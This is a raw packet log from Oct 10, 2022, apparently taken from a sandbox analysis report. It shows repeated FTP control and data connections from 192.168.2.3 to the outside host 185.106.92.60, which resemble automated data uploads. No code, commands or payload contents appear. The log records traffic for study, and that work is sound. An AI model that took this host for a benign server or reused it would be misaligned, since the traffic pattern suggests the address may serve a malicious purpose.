                                                                                                                                    Oct 10, 2022 06:02:25.276132107 CEST4974464529192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.299170971 CEST6452949744185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.301717043 CEST4974464529192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.302752018 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.326240063 CEST2149743185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.326498985 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.327105999 CEST4974464529192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.350121021 CEST6452949744185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.350236893 CEST6452949744185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.350373030 CEST4974464529192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.350950003 CEST2149743185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.351823092 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.351885080 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.374706984 CEST2149743185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.374866009 CEST2149743185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.375099897 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.506716967 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.531003952 CEST2149745185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.531265020 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.559611082 CEST2149745185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.559639931 CEST2149745185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.559653044 CEST2149745185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.559920073 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.560300112 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.585230112 CEST2149745185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.585436106 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.585829973 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.610486031 CEST2149745185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.610585928 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.610757113 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.636245966 CEST2149745185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.636362076 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.636636972 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.661047935 CEST2149745185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.661216974 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.662146091 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.687202930 CEST2149745185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.687437057 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.688616991 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.714704990 CEST2149745185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.714788914 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.715015888 CEST4974664531192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.737672091 CEST6453149746185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.737972021 CEST4974664531192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.738285065 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.763020992 CEST2149745185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.763204098 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.763632059 CEST4974664531192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.786623001 CEST6453149746185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.821993113 CEST6453149746185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.822125912 CEST4974664531192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.823066950 CEST2149745185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.823200941 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.823267937 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.847810984 CEST2149745185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.847861052 CEST2149745185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.848071098 CEST4974521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.966933012 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.989834070 CEST2149747185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.989948988 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.015989065 CEST2149747185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.016052961 CEST2149747185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.016189098 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.016233921 CEST2149747185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.016362906 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.016446114 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.039206028 CEST2149747185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.039458036 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.039613008 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.062460899 CEST2149747185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.062602043 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.062753916 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.085414886 CEST2149747185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.085537910 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.085777044 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.109057903 CEST2149747185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.109302998 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.109786987 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.133687973 CEST2149747185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.133882046 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.154716015 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.179256916 CEST2149747185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.179362059 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.179671049 CEST4974864532192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.203367949 CEST6453249748185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.203504086 CEST4974864532192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.203735113 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.227003098 CEST2149747185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.227154016 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.277049065 CEST4974864532192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.300576925 CEST2149747185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.300803900 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.300844908 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.301917076 CEST6453249748185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.301984072 CEST6453249748185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.302036047 CEST4974864532192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.323349953 CEST2149747185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.323390961 CEST2149747185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.323507071 CEST4974721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.452225924 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.475255966 CEST2149749185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.475369930 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.510538101 CEST2149749185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.510613918 CEST2149749185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.510648966 CEST2149749185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.510658979 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.510735035 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.510766029 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.510967016 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.534046888 CEST2149749185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.534174919 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.534321070 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.557298899 CEST2149749185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.557435036 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.559933901 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.583210945 CEST2149749185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.583316088 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.583482027 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.606687069 CEST2149749185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.606789112 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.607278109 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.630069971 CEST2149749185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.630152941 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.631192923 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.655092001 CEST2149749185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.655179977 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.655405998 CEST4975064533192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.678303957 CEST6453349750185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.678397894 CEST4975064533192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.678828955 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.701984882 CEST2149749185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.702049971 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.702774048 CEST4975064533192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.724955082 CEST6453349750185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.725153923 CEST6453349750185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.725239038 CEST4975064533192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.726069927 CEST2149749185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.726141930 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.726275921 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.748761892 CEST2149749185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.748832941 CEST2149749185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.748907089 CEST4974921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.862663031 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.886800051 CEST2149751185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.886893988 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.913997889 CEST2149751185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.914016962 CEST2149751185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.914028883 CEST2149751185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.914081097 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.914105892 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.914314985 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.938612938 CEST2149751185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.938709974 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.938879013 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.963206053 CEST2149751185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.963512897 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.964164972 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.988044024 CEST2149751185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:26.988149881 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:26.988353968 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.013952017 CEST2149751185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.014101982 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.015237093 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.038867950 CEST2149751185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.039046049 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.046520948 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.071388006 CEST2149751185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.071469069 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.073246002 CEST4975264534192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.097794056 CEST6453449752185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.097908020 CEST4975264534192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.098135948 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.122947931 CEST2149751185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.123018026 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.123569012 CEST4975264534192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.147243977 CEST6453449752185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.147527933 CEST6453449752185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.147587061 CEST4975264534192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.148246050 CEST2149751185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.148308039 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.148444891 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.172472954 CEST2149751185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.172523975 CEST2149751185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.172585964 CEST4975121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.283231974 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.308011055 CEST2149753185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.308146000 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.336124897 CEST2149753185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.336146116 CEST2149753185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.336158991 CEST2149753185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.336390972 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.336652994 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.360908031 CEST2149753185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.360985994 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.361177921 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.386550903 CEST2149753185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.386667013 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.386898041 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.410043001 CEST2149753185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.410198927 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.410573959 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.436216116 CEST2149753185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.436316967 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.436733007 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.462589025 CEST2149753185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.462748051 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.463716984 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.490226984 CEST2149753185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.490345001 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.490596056 CEST4975464535192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.513243914 CEST6453549754185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.513381958 CEST4975464535192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.513791084 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.538522005 CEST2149753185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.538664103 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.539254904 CEST4975464535192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.562011003 CEST6453549754185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.562213898 CEST6453549754185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.562386990 CEST4975464535192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.562412977 CEST2149753185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.562474012 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.562738895 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.586796045 CEST2149753185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.586985111 CEST2149753185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.587930918 CEST4975321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.698537111 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.721348047 CEST2149755185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.721566916 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.747332096 CEST2149755185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.747350931 CEST2149755185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.747363091 CEST2149755185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.747489929 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.747994900 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.770977974 CEST2149755185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.771677017 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.771816969 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.794589043 CEST2149755185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.795691013 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.795839071 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.818536997 CEST2149755185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.818800926 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.819093943 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.842153072 CEST2149755185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.843647957 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.844141960 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.866974115 CEST2149755185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.867671013 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.869079113 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.892412901 CEST2149755185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.895751953 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.896361113 CEST4975664537192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.922908068 CEST6453749756185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.923067093 CEST4975664537192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.923419952 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.948359013 CEST2149755185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.948494911 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.949234962 CEST4975664537192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.975126028 CEST2149755185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.975306034 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.975500107 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.977128983 CEST6453749756185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.977164030 CEST6453749756185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.977277040 CEST4975664537192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:27.998226881 CEST2149755185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.998275042 CEST2149755185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:27.998457909 CEST4975521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.137564898 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.163408041 CEST2149757185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.163552999 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.192397118 CEST2149757185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.192423105 CEST2149757185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.192517042 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.192748070 CEST2149757185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.195126057 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.195347071 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.221292973 CEST2149757185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.223702908 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.224623919 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.250910044 CEST2149757185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.255656958 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.255887032 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.283354998 CEST2149757185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.283428907 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.283714056 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.310784101 CEST2149757185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.314737082 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.315413952 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.341032982 CEST2149757185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.341814041 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.360105038 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.386359930 CEST2149757185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.387341022 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.392518997 CEST4975864538192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.414823055 CEST6453849758185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.417761087 CEST4975864538192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.418236017 CEST4975721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:28.444776058 CEST2149757185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:28.447401047 CEST4975721192.168.2.3185.106.92.60
